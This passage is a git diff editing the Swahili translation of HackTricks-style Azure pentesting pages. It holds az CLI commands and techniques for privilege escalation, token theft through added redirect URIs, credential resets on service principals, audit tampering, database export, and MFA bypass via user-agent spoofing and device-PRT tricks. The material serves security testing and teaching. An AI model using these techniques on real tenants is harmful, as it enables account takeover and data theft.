mada unahitaji pia Action:`Microsoft.ServiceBus/namespaces/topics/read`) ndani ya jina la Azure Service Bus anaweza kutumia hii kuharibu mchakato wa ujumbe, kufichua data nyeti, au kuwezesha vitendo visivyoidhinishwa. Kwa kutumia amri kama az servicebus topic update, wanaweza kubadilisha mipangilio kama vile kuwezesha ugawaji kwa matumizi mabaya ya upanuzi, kubadilisha mipangilio ya TTL ili kuhifadhi au kutupa ujumbe vibaya, au kuzima ugunduzi wa nakala ili kupita udhibiti. Zaidi ya hayo, wanaweza kurekebisha mipaka ya ukubwa wa mada, kubadilisha hali ili kuharibu upatikanaji, au kuunda mada za haraka kuhifadhi ujumbe waliokamatwa kwa muda, na kufanya usimamizi wa mada kuwa kipaumbele muhimu kwa kupunguza madhara baada ya unyakuzi. +Mshambuliaji mwenye ruhusa za kuunda au kubadilisha mada (ili kubadilisha mada unahitaji pia Action: `Microsoft.ServiceBus/namespaces/topics/read`) ndani ya eneo la Azure Service Bus anaweza kutumia hii kuharibu mchakato wa ujumbe, kufichua data nyeti, au kuwezesha vitendo visivyoidhinishwa. Kwa kutumia amri kama az servicebus topic update, wanaweza kubadilisha mipangilio kama vile kuwezesha ugawaji kwa matumizi mabaya ya upanuzi, kubadilisha mipangilio ya TTL ili kuhifadhi au kutupa ujumbe vibaya, au kuzima ugunduzi wa nakala ili kupita udhibiti. Zaidi ya hayo, wanaweza kurekebisha mipaka ya ukubwa wa mada, kubadilisha hali ili kuharibu upatikanaji, au kuunda mada za haraka kuhifadhi ujumbe waliokamatwa kwa muda, na kufanya usimamizi wa mada kuwa kipaumbele muhimu kwa kupunguza madhara baada ya kutekeleza. ```bash az servicebus topic create --resource-group --namespace-name --name az servicebus topic update --resource-group --namespace-name --name @@ -62,7 +62,7 @@ Mshambuliaji mwenye ruhusa za kuunda au kubadilisha usajili (ili kubadilisha usa az servicebus topic subscription create --resource-group --namespace-name --topic-name --name az servicebus topic subscription update --resource-group --namespace-name --topic-name --name ``` -### Vitendo: `AuthorizationRules` Tuma & Pokea Ujumbe +### Actions: `AuthorizationRules` Tuma & Pokea Ujumbe Angalia hapa: @@ -70,7 +70,7 @@ Angalia hapa: ../az-privilege-escalation/az-queue-privesc.md {{#endref}} -## Marejeleo +## Marejeo - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md index bc2ea167c..0e03818c8 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md @@ -42,7 +42,7 @@ az sql elastic-pool update \ ``` ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write" -Kwa ruhusa hii, unaweza kubadilisha au kuwezesha mipangilio ya ukaguzi kwenye Azure SQL Server. Hii inaweza kumruhusu mshambuliaji au mtumiaji aliyeidhinishwa kubadilisha usanidi wa ukaguzi, ambayo inaweza kufunika nyayo au kuelekeza kumbukumbu za ukaguzi kwenye eneo chini ya udhibiti wao. Hii inaweza kuzuia ufuatiliaji wa usalama au kuwezesha kuendelea kufuatilia vitendo. KUMBUKA: Ili kuwezesha ukaguzi kwa Azure SQL Server ukitumia Blob Storage, lazima uunganishe akaunti ya hifadhi ambapo kumbukumbu za ukaguzi zinaweza kuhifadhiwa. +Kwa ruhusa hii, unaweza kubadilisha au kuwezesha mipangilio ya ukaguzi kwenye Azure SQL Server. Hii inaweza kumruhusu mshambuliaji au mtumiaji aliyeidhinishwa kubadilisha usanidi wa ukaguzi, ambayo inaweza kuficha alama au kuelekeza kumbukumbu za ukaguzi kwenye eneo chini ya udhibiti wao. Hii inaweza kuzuia ufuatiliaji wa usalama au kuwezesha kuendelea kufuatilia vitendo. KUMBUKA: Ili kuwezesha ukaguzi kwa Azure SQL Server ukitumia Blob Storage, lazima uunganishe akaunti ya hifadhi ambapo kumbukumbu za ukaguzi zinaweza kuhifadhiwa. ```bash az sql server audit-policy update \ --server \ @@ -62,7 +62,7 @@ az sql server connection-policy update \ ``` ### "Microsoft.Sql/servers/databases/export/action" -Kwa ruhusa hii, unaweza kusafirisha database kutoka kwa Azure SQL Server hadi akaunti ya hifadhi. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha data nyeti kutoka kwa database kwa kuisafirisha hadi eneo wanadhibiti, na kuleta hatari kubwa ya uvunjaji wa data. Ni muhimu kujua funguo za hifadhi ili uweze kufanya hivi. +Kwa ruhusa hii, unaweza kusafirisha database kutoka kwa Azure SQL Server hadi akaunti ya hifadhi. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha data nyeti kutoka kwa database kwa kuisafirisha hadi mahali wanadhibiti, na kuleta hatari kubwa ya uvujaji wa data. Ni muhimu kujua funguo za hifadhi ili uweze kufanya hivi. ```bash az sql db export \ --server \ @@ -76,7 +76,7 @@ az sql db export \ ``` ### "Microsoft.Sql/servers/databases/import/action" -Kwa ruhusa hii, unaweza kuingiza database kwenye Azure SQL Server. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha databases zenye madhara au zilizobadilishwa. Hii inaweza kusababisha kudhibiti data nyeti au kwa kuingiza scripts au triggers zenye madhara ndani ya database iliyounganishwa. Zaidi ya hayo, unaweza kuingiza kwenye seva yako mwenyewe katika azure. Kumbuka: Seva lazima iruhusu huduma na rasilimali za Azure kufikia seva hiyo. +Kwa ruhusa hii, unaweza kuingiza database kwenye Azure SQL Server. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hii anaweza kuhamasisha database zenye madhara au zilizobadilishwa. Hii inaweza kusababisha kudhibiti data nyeti au kwa kuingiza scripts au triggers zenye madhara ndani ya database iliyohamishwa. Zaidi ya hayo, unaweza kuingiza kwenye seva yako mwenyewe katika azure. Kumbuka: Seva lazima iruhusu huduma na rasilimali za Azure kufikia seva hiyo. ```bash az sql db import --admin-user \ --admin-password \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md index 0cd91db78..f204235f9 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md @@ -30,7 +30,7 @@ Mtu mwenye ruhusa hii ataweza **kuandika na kufuta entries katika meza** ambayo - Ruhusa `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` inaruhusu vitendo vyote. - Ruhusa `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` inaruhusu **kuongeza** entries -- Ruhusa `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` inaruhusu **kupdate** entries zilizopo +- Ruhusa `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` inaruhusu **k updates** entries zilizopo ```bash # Add az storage entity insert \ diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md index fda7a03dd..14014fbe7 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -12,13 +12,13 @@ Kwa maelezo zaidi kuhusu Azure VMs na mtandao angalia ukurasa ufuatao: ### VM Application Pivoting -Programu za VM zinaweza kushirikiwa na usajili na wapangaji wengine. Ikiwa programu inashirikiwa inawezekana kwa sababu inatumika. Hivyo, ikiwa mshambuliaji anafanikiwa **kudhoofisha programu na kupakia toleo lililo na backdoor** inaweza kuwa inawezekana kwamba itatekelezwa **katika mpangaji au usajili mwingine**. +Programu za VM zinaweza kushirikiwa na usajili na wapangaji wengine. Ikiwa programu inashirikiwa inawezekana kwa sababu inatumika. Hivyo, ikiwa mshambuliaji anafanikiwa **kudhoofisha programu na kupakia toleo lililo na backdoor** inaweza kuwa inawezekana kwamba itatekelezwa **katika wapangaji au usajili mwingine**. ### Taarifa nyeti katika picha -Inaweza kuwa inawezekana kupata **taarifa nyeti ndani ya picha** zilizochukuliwa kutoka kwa VMs katika siku za nyuma. +Inaweza kuwa inawezekana kupata **taarifa nyeti ndani ya picha** zilizochukuliwa kutoka kwa VMs katika kipindi kilichopita. -1. **Orodhesha picha** kutoka kwenye maktaba +1. **Orodhesha picha** kutoka kwa maktaba ```bash # Get galleries az sig list -o table @@ -61,14 +61,14 @@ az restore-point list \ --restore-point-collection-name \ -o table ``` -2. **Unda diski** kutoka kwa alama ya kurejesha +2. **Unda diski** kutoka kwa hatua ya kurejesha ```bash az disk create \ --resource-group \ --name \ --source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/ ``` -3. **Unganisha diski kwenye VM** (mshambuliaji anahitaji kuwa amepata udhibiti wa VM ndani ya akaunti tayari) +3. **Unganisha diski kwenye VM** (mshambuliaji anahitaji kuwa ameshambulia VM ndani ya akaunti tayari) ```bash az vm disk attach \ --resource-group \ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md index d2b8dac87..9e5368c4b 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md @@ -40,10 +40,10 @@ az role definition update --role-definition role.json ``` ### Microsoft.Authorization/elevateAccess/action -Ruhusa hizi zinaruhusu kuinua mamlaka na kuwa na uwezo wa kutoa ruhusa kwa mtu yeyote kwa rasilimali za Azure. Imeandaliwa kutolewa kwa Wasimamizi wa Kimataifa wa Entra ID ili waweze pia kusimamia ruhusa juu ya rasilimali za Azure. +Ruhusa hii inaruhusu kuinua mamlaka na kuwa na uwezo wa kutoa ruhusa kwa mtu yeyote kwa rasilimali za Azure. Imeandaliwa kutolewa kwa Wasimamizi wa Kimataifa wa Entra ID ili waweze pia kusimamia ruhusa juu ya rasilimali za Azure. > [!TIP] -> Nadhani mtumiaji anahitaji kuwa Msimamizi wa Kimataifa katika Entra ID ili simu ya kuinua ifanye kazi. +> Nadhani mtumiaji anahitaji kuwa Msimamizi wa Kimataifa katika Entra ID ili wito wa kuinua ufanye kazi. ```bash # Call elevate az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index 4513c8b31..41790c41d 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -3,7 +3,7 @@ {{#include ../../../../banners/hacktricks-training.md}} > [!NOTE] -> Kumbuka kwamba **sio ruhusa zote za granular** ambazo majukumu ya ndani yana katika Entra ID **zinastahili kutumika katika majukumu ya kawaida.** +> Kumbuka kwamba **sio ruhusa zote za granular** zilizojengwa katika majukumu ya Entra ID **zinastahili kutumika katika majukumu ya kawaida.** ## Majukumu @@ -79,7 +79,7 @@ az ad app owner list --id Mshambuliaji anaweza kuongeza URI ya kuelekeza kwa programu zinazotumiwa na watumiaji wa mpangilio na kisha kushiriki nao URL za kuingia zinazotumia URL mpya ya kuelekeza ili kuiba token zao. Kumbuka kwamba ikiwa mtumiaji tayari alikuwa amejiunga na programu, uthibitishaji utaenda kiotomatiki bila mtumiaji kuhitaji kukubali chochote. -Kumbuka kwamba pia inawezekana kubadilisha ruhusa ambazo programu inazitaka ili kupata ruhusa zaidi, lakini katika kesi hii mtumiaji atahitaji kukubali tena ombi linalouliza ruhusa zote. +Kumbuka kwamba pia inawezekana kubadilisha ruhusa ambazo programu inazihitaji ili kupata ruhusa zaidi, lakini katika kesi hii mtumiaji atahitaji kukubali tena ombi linaloomba ruhusa zote. ```bash # Get current redirect uris az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" @@ -90,7 +90,7 @@ az ad app update --id --web-redirect-uris "https://original.com/callbac ### `microsoft.directory/servicePrincipals/credentials/update` -Hii inaruhusu mshambuliaji kuongeza akidi kwa huduma zilizopo. Ikiwa huduma hiyo ina mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo. +Hii inaruhusu mshambuliaji kuongeza akidi kwa wahusika wa huduma waliopo. Ikiwa mhusika wa huduma ana mamlaka ya juu, mshambuliaji anaweza kuchukua mamlaka hayo. ```bash az ad sp credential reset --id --append ``` @@ -110,7 +110,7 @@ az ad sp credential reset --id --append ``` ### `microsoft.directory/servicePrincipals/owners/update` -Kama ilivyo kwa programu, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti hati zake na ruhusa. +Kama ilivyo kwa maombi, ruhusa hii inaruhusu kuongeza wamiliki zaidi kwa huduma ya msingi. Kumiliki huduma ya msingi kunaruhusu kudhibiti hati zake na ruhusa. ```bash # Add new owner spId="" @@ -132,9 +132,9 @@ az ad sp owner list --id ### `microsoft.directory/servicePrincipals/disable` na `enable` -Hizi ruhusa zinaruhusu kuzima na kuwezesha wahusika wa huduma. Mshambuliaji anaweza kutumia ruhusa hii kuwezesha mhusika wa huduma ambaye anaweza kupata ufikiaji wa namna fulani ili kupandisha hadhi. +Ruhusa hizi zinaruhusu kuzima na kuwezesha wahusika wa huduma. Mshambuliaji anaweza kutumia ruhusa hii kuwezesha mhusika wa huduma ambaye anaweza kupata ufikiaji wa namna fulani ili kupandisha hadhi. -Kumbuka kwamba kwa ajili ya mbinu hii mshambuliaji atahitaji ruhusa zaidi ili kuchukua udhibiti wa mhusika wa huduma aliyewezeshwa. +Kumbuka kwamba kwa mbinu hii mshambuliaji atahitaji ruhusa zaidi ili kuchukua udhibiti wa mhusika wa huduma aliyewezeshwa. ```bash bashCopy code# Disable az ad sp update --id --account-enabled false @@ -187,13 +187,13 @@ az ad group member add --group --member-id ### `microsoft.directory/groups/members/update` -Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza mwenyewe au akaunti mbaya kwenye vikundi vyenye mamlaka ambavyo vinaweza kutoa ufikiaji wa juu. +Ruhusa hii inaruhusu kuongeza wanachama kwenye kundi. Mshambuliaji anaweza kujiongeza mwenyewe au akaunti mbaya kwenye vikundi vyenye mamlaka ambayo yanaweza kutoa ufikiaji wa juu. ```bash az ad group member add --group --member-id ``` ### `microsoft.directory/groups/dynamicMembershipRule/update` -Ruhusa hii inaruhusu kuboresha sheria za uanachama katika kundi la dynamic. Mshambuliaji anaweza kubadilisha sheria za dynamic ili kujumuisha mwenyewe katika vikundi vyenye mamlaka bila kuongeza wazi. +Ruhusa hii inaruhusu kubadilisha sheria za uanachama katika kundi la dynamic. Mshambuliaji anaweza kubadilisha sheria za dynamic ili kujumuisha mwenyewe katika vikundi vyenye mamlaka bila kuongeza wazi. ```bash groupId="" az rest --method PATCH \ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index cce91f980..63d5f58f7 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -10,13 +10,13 @@ Sera za ufikiaji wa masharti kimsingi **zinaelezea** **Nani** anaweza kufikia ** Hapa kuna mifano kadhaa: 1. **Sera ya Hatari ya Kuingia**: Sera hii inaweza kuwekwa ili kuhitaji uthibitisho wa hatua nyingi (MFA) wakati hatari ya kuingia inagundulika. Kwa mfano, ikiwa tabia ya kuingia ya mtumiaji ni ya ajabu ikilinganishwa na muundo wao wa kawaida, kama kuingia kutoka nchi tofauti, mfumo unaweza kuomba uthibitisho wa ziada. -2. **Sera ya Uzingatiaji wa Kifaa**: Sera hii inaweza kuzuia ufikiaji wa huduma za Azure tu kwa vifaa vinavyokidhi viwango vya usalama vya shirika. Kwa mfano, ufikiaji unaweza kuruhusiwa tu kutoka kwa vifaa vilivyo na programu ya antivirus iliyo na sasisho au vinavyotumia toleo fulani la mfumo wa uendeshaji. +2. **Sera ya Uzingatiaji wa Kifaa**: Sera hii inaweza kuzuia ufikiaji wa huduma za Azure tu kwa vifaa ambavyo vinakidhi viwango vya usalama vya shirika. Kwa mfano, ufikiaji unaweza kuruhusiwa tu kutoka kwa vifaa ambavyo vina programu ya antivirus iliyo na sasisho au vinatumia toleo fulani la mfumo wa uendeshaji. ## Bypass za Sera za Ufikiaji wa Masharti -Inawezekana kwamba sera ya ufikiaji wa masharti **inaangalia taarifa ambazo zinaweza kubadilishwa kwa urahisi kuruhusu bypass ya sera**. Na ikiwa kwa mfano sera ilikuwa inakamilisha MFA, mshambuliaji ataweza kuipita. +Inawezekana kwamba sera ya ufikiaji wa masharti **inaangalia taarifa fulani ambazo zinaweza kubadilishwa kwa urahisi kuruhusu bypass ya sera**. Na ikiwa kwa mfano sera ilikuwa inakamilisha MFA, mshambuliaji ataweza kuipita. -Wakati wa kuunda sera ya ufikiaji wa masharti inahitajika kuashiria **watumiaji** walioathirika na **rasilimali za lengo** (kama programu zote za wingu). +Wakati wa kuunda sera ya ufikiaji wa masharti inahitajika kuashiria **watumiaji** walioathiriwa na **rasilimali za lengo** (kama programu zote za wingu). Pia inahitajika kuunda **masharti** ambayo yatakuwa **yanasababisha** sera: @@ -24,18 +24,18 @@ Pia inahitajika kuunda **masharti** ambayo yatakuwa **yanasababisha** sera: - Inaweza kupitishwa kwa kutumia VPN au Proxy kuungana na nchi au kufanikiwa kuingia kutoka anwani ya IP iliyoidhinishwa - **Hatari za Microsoft**: Hatari ya mtumiaji, hatari ya kuingia, hatari ya ndani - **Majukwaa ya vifaa**: Kifaa chochote au chagua Android, iOS, Windows phone, Windows, macOS, Linux -- Ikiwa “Kifaa chochote” hakijachaguliwa lakini chaguo zingine zote zimechaguliwa inawezekana kupita kwa kutumia user-agent isiyo ya kawaida isiyohusiana na majukwaa hayo +- Ikiwa “Kifaa chochote” hakijachaguliwa lakini chaguo zingine zote zimechaguliwa inawezekana kupita kwa kutumia user-agent wa bahati nasibu usiohusiana na majukwaa hayo - **Programu za mteja**: Chaguo ni “Kivinjari”, “Programu za simu na wateja wa desktop”, “Wateja wa Exchange ActiveSync” na Wateja Wengine” - Ili kupita kuingia na chaguo kisichochaguliwa - **Filter kwa vifaa**: Inawezekana kuunda sheria inayohusiana na kifaa kilichotumika - **Mchakato wa uthibitishaji**: Chaguo ni “Mchakato wa nambari ya kifaa” na “Uhamisho wa uthibitishaji” -- Hii haitamathirisha mshambuliaji isipokuwa anajaribu kutumia mojawapo ya protokali hizo katika jaribio la phishing kuingia kwenye akaunti ya mwathirika +- Hii haitamathirisha mshambuliaji isipokuwa anajaribu kutumia mojawapo ya protokali hizo katika jaribio la uvuvi kuingia kwenye akaunti ya mwathirika Matokeo yanayoweza kutokea ni: Zuia au Ruhusu ufikiaji na masharti yanayoweza kama kuhitaji MFA, kifaa kuwa na uzingatiaji... ### Majukwaa ya Vifaa - Hali ya Kifaa -Inawezekana kuweka hali kulingana na **jukwaa la kifaa** (Android, iOS, Windows, macOS...), hata hivyo, hii inategemea **user-agent** hivyo ni rahisi kupita. Hata **kufanya chaguo zote zitekeleze MFA**, ikiwa utatumia **user-agent ambayo haitambuliwi,** utaweza kupita MFA au kuzuia: +Inawezekana kuweka hali kulingana na **jukwaa la kifaa** (Android, iOS, Windows, macOS...), hata hivyo, hii inategemea **user-agent** hivyo ni rahisi kupita. Hata **kufanya chaguo zote zitekeleze MFA**, ikiwa unatumia **user-agent ambayo haitambuliwi,** utaweza kupita MFA au kuzuia:
@@ -65,11 +65,11 @@ roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4 ``` -Zaidi ya hayo, inawezekana pia kulinda njia ya kuingia (kwa mfano, ikiwa unajaribu kuingia kutoka kwa kivinjari au kutoka kwa programu ya desktop). Chombo [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) hufanya baadhi ya ukaguzi ili kujaribu kupita hizi ulinzi pia. +Zaidi ya hayo, inawezekana pia kulinda njia ya kuingia (kwa mfano, ikiwa unajaribu kuingia kutoka kwa kivinjari au kutoka kwa programu ya desktop). Zana [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) inafanya baadhi ya ukaguzi ili kujaribu kupita hizi ulinzi pia. -Chombo [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) kinaweza pia kutumika kwa madhumuni sawa ingawa kinaonekana hakijatunzwa. +Zana [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) inaweza pia kutumika kwa madhumuni sawa ingawa inaonekana haijatunzwa. -Chombo [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kinaweza pia kutumika kujaribu hizi ulinzi na kuona ikiwa inawezekana kupita MFAs au vizuizi, lakini chombo hiki kinatumika kutoka kwa mtazamo wa **whitebox**. Kwanza unahitaji kupakua orodha ya Programu zilizoruhusiwa katika tenant na kisha itajaribu kuingia ndani yao. +Zana [**ROPCI**](https://github.com/wunderwuzzi23/ropci) inaweza pia kutumika kujaribu hizi ulinzi na kuona ikiwa inawezekana kupita MFAs au vizuizi, lakini zana hii inafanya kazi kutoka kwa mtazamo wa **whitebox**. Kwanza unahitaji kupakua orodha ya Programu zilizoruhusiwa katika tenant na kisha itajaribu kuingia ndani yao. ## Mipango Mingine ya Az MFA @@ -78,13 +78,13 @@ Chombo [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kinaweza pia kutumika Chaguo moja la Azure MFA ni **kupokea simu katika nambari ya simu iliyowekwa** ambapo itamwuliza mtumiaji **kutuma herufi `#`**. > [!CAUTION] -> Kwa kuwa herufi ni **sauti tu**, mshambuliaji anaweza **kuathiri** ujumbe wa **voicemail** wa nambari ya simu, kuweka kama ujumbe **sauti ya `#`** na kisha, wakati wa kuomba MFA hakikisha kwamba **simu ya waathiriwa inashughulika** (ikiitafuta) ili simu ya Azure irejeleze kwenye voicemail. +> Kwa kuwa herufi ni tu **sauti**, mshambuliaji anaweza **kuathiri** ujumbe wa **voicemail** wa nambari ya simu, kuweka kama ujumbe **sauti ya `#`** na kisha, wakati wa kuomba MFA hakikisha kwamba **simu ya waathiriwa inashughulika** (ikiita) ili simu ya Azure irejeleze kwenye voicemail. ### Vifaa Vinavyokubalika -Sera mara nyingi huomba kifaa kinachokubalika au MFA, hivyo **mshambuliaji anaweza kujiandikisha kifaa kinachokubalika**, kupata token ya **PRT** na **kupita hivi hivyo MFA**. +Sera mara nyingi zinahitaji kifaa kinachokubalika au MFA, hivyo **mshambuliaji anaweza kujiandikisha kifaa kinachokubalika**, kupata **PRT** token na **kupita kwa njia hii MFA**. -Anza kwa kujiandikisha kifaa **kinachokubalika katika Intune**, kisha **pata PRT** kwa: +Anza kwa kujiandikisha **kifaa kinachokubalika katika Intune**, kisha **pata PRT** na: ```powershell $prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\.pfx -Credentials $credentials @@ -104,9 +104,9 @@ Pata maelezo zaidi kuhusu aina hii ya shambulio katika ukurasa ufuatao: ### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) -Script hii inapata baadhi ya akidi za mtumiaji na kuangalia kama inaweza kuingia katika baadhi ya programu. +Hii script inapata baadhi ya akidi za mtumiaji na kuangalia kama inaweza kuingia katika baadhi ya programu. -Hii ni muhimu kuona kama **huhitajiki MFA kuingia katika baadhi ya programu** ambazo unaweza baadaye kuzitumia ili **kuinua haki**. +Hii ni muhimu kuona kama **huhitajiki MFA kuingia katika baadhi ya programu** ambazo unaweza baadaye kutumia vibaya ili **kuinua haki**. ### [roadrecon](https://github.com/dirkjanm/ROADtools) diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md index 4b56bbd40..6ceae0535 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md @@ -4,7 +4,7 @@ ## Basic Information -**Dynamic groups** ni vikundi ambavyo vina seti ya **rules** zilizowekwa na watumiaji au vifaa vyote vinavyolingana na sheria hizo vinajumuishwa kwenye kundi. Kila wakati **attribute** ya mtumiaji au kifaa inapo **badilishwa**, sheria za dynamic zinarejelewa. Na wakati **sheria mpya** inapo **undwa**, vifaa vyote na watumiaji vinakaguliwa. +**Dynamic groups** ni vikundi ambavyo vina seti ya **rules** zilizowekwa na watumiaji au vifaa vyote vinavyolingana na sheria hizo vinaongezwa kwenye kundi. Kila wakati **attribute** ya mtumiaji au kifaa inapo **badilishwa**, sheria za dynamic zinarejelewa. Na wakati **sheria mpya** inapo **undwa**, vifaa vyote na watumiaji vinakaguliwa. Vikundi vya dynamic vinaweza kuwa na **Azure RBAC roles** zilizotolewa kwao, lakini **haiwezekani** kuongeza **AzureAD roles** kwenye vikundi vya dynamic. diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index 110ec4e68..d8fe23f18 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md @@ -12,13 +12,13 @@ Angalia ukurasa ufuatao kwa maelezo zaidi: ### Bucket Read/Write -Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi inawezekana kupata **kontena tofauti** (za kawaida au zenye majina yaliyowekwa awali) ambayo yanaweza kuwa na **msimbo unaotekelezwa na kazi**. +Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi, inawezekana kupata **kontena tofauti** (za kawaida au zenye majina yaliyoainishwa) ambayo yanaweza kuwa na **msimbo unaotekelezwa na kazi**. -Mara tu unapopata mahali ambapo msimbo wa kazi umehifadhiwa ikiwa una ruhusa za kuandika juu yake unaweza kufanya kazi itekeleze msimbo wowote na kupandisha hadhi kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo. +Mara tu unapopata mahali ambapo msimbo wa kazi uko, ikiwa una ruhusa za kuandika juu yake, unaweza kufanya kazi itekeleze msimbo wowote na kupandisha hadhi kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo. - **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`) -Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya file share. Kwa ufikiaji wa kutosha inawezekana kubadilisha faili ya msimbo na **kufanya kazi ipakue msimbo wowote** ikiruhusu kupandisha hadhi kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi. +Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya file share. Kwa ufikiaji wa kutosha, inawezekana kubadilisha faili ya msimbo na **kufanya kazi ipakue msimbo wowote** ikiruhusu kupandisha hadhi kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi. Njia hii ya kutekeleza kawaida huweka mipangilio **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** na **`WEBSITE_CONTENTSHARE`** ambazo unaweza kupata kutoka ```bash @@ -58,7 +58,7 @@ az functionapp config appsettings list \ Hii config kwa kawaida itakuwa na **SAS URL ya kupakua** msimbo kutoka kwa Akaunti ya Hifadhi. > [!CAUTION] -> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linashikilia msimbo katika zip** inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha ruhusa. +> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linashikilia msimbo katika zip** inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha mamlaka. - **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` @@ -98,7 +98,7 @@ unsquashfs -l "/tmp/scm-latest-.zip" mkdir /tmp/fs unsquashfs -d /tmp/fs /tmp/scm-latest-.zip ``` -Ni possible pia kupata **funguo za master na functions** zilizohifadhiwa katika akaunti ya hifadhi ndani ya kontena **`azure-webjobs-secrets`** ndani ya folda **``** katika faili za JSON unazoweza kupata ndani yake. +Ni possible pia kupata **funguo za master na functions** zilizohifadhiwa katika akaunti ya hifadhi katika kontena **`azure-webjobs-secrets`** ndani ya folda **``** katika faili za JSON unazoweza kupata ndani. > [!CAUTION] > Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linabeba msimbo katika faili la nyongeza ya zip** (ambalo kwa kweli ni **`squashfs`**) inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa. @@ -122,7 +122,7 @@ Ruhusa hii inaruhusu kuorodhesha funguo za kazi, funguo kuu na funguo za mfumo, ```bash az functionapp keys list --resource-group --name ``` -Kwa funguo kuu, pia inawezekana 